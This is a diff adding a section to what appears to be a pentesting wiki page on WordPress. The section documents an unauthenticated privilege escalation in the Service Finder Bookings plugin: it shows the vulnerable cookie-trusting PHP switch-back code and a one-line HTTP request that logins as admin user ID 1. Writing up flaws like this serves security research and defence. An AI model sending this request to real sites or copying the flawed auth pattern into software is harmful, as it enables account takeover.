diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index 7e65453a3..549507bfc 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md @@ -608,6 +608,59 @@ add_action( 'profile_update', function( $user_id ) { --- +### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder “sf-booking”) + +Some plugins wire user-switching helpers to the public `init` hook and derive identity from a client-controlled cookie. If the code calls `wp_set_auth_cookie()` without verifying authentication, capability and a valid nonce, any unauthenticated visitor can force login as an arbitrary user ID. + +Typical vulnerable pattern (simplified from Service Finder Bookings ≤ 6.1): + +```php +function service_finder_submit_user_form(){ + if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) { + $user_id = intval( sanitize_text_field($_GET['switch_user']) ); + service_finder_switch_user($user_id); + } + if ( isset($_GET['switch_back']) ) { + service_finder_switch_back(); + } +} +add_action('init', 'service_finder_submit_user_form'); + +function service_finder_switch_back() { + if ( isset($_COOKIE['original_user_id']) ) { + $uid = intval($_COOKIE['original_user_id']); + if ( get_userdata($uid) ) { + wp_set_current_user($uid); + wp_set_auth_cookie($uid); // 🔥 sets auth for attacker-chosen UID + do_action('wp_login', get_userdata($uid)->user_login, get_userdata($uid)); + setcookie('original_user_id', '', time() - 3600, '/'); + wp_redirect( admin_url('admin.php?page=candidates') ); + exit; + } + wp_die('Original user not found.'); + } + wp_die('No original user found to switch back to.'); +} +``` + +Why it’s exploitable + +- Public `init` hook makes the handler reachable by unauthenticated users (no `is_user_logged_in()` guard). +- Identity is derived from a client-modifiable cookie (`original_user_id`). +- Direct call to `wp_set_auth_cookie($uid)` logs the requester in as that user without any capability/nonce checks. + +Exploitation (unauthenticated) + +```http +GET /?switch_back=1 HTTP/1.1 +Host: victim.example +Cookie: original_user_id=1 +User-Agent: PoC +Connection: close +``` + +--- + ### WAF considerations for WordPress/plugin CVEs Generic edge/server WAFs are tuned for broad patterns (SQLi, XSS, LFI). Many high‑impact WordPress/plugin flaws are application-specific logic/auth bugs that look like benign traffic unless the engine understands WordPress routes and plugin semantics. @@ -722,5 +775,7 @@ The server responds with the contents of `wp-config.php`, leaking DB credentials - [Hosting security tested: 87.8% of vulnerability exploits bypassed hosting defenses](https://patchstack.com/articles/hosting-security-tested-87-percent-of-vulnerability-exploits-bypassed-hosting-defenses/) - [WooCommerce Payments ≤ 5.6.1 – Unauth privilege escalation via trusted header (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/woocommerce-payments/vulnerability/wordpress-woocommerce-payments-plugin-5-6-1-unauthenticated-privilege-escalation-vulnerability) - [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/) +- [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/) +- [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability) {{#include ../../banners/hacktricks-training.md}}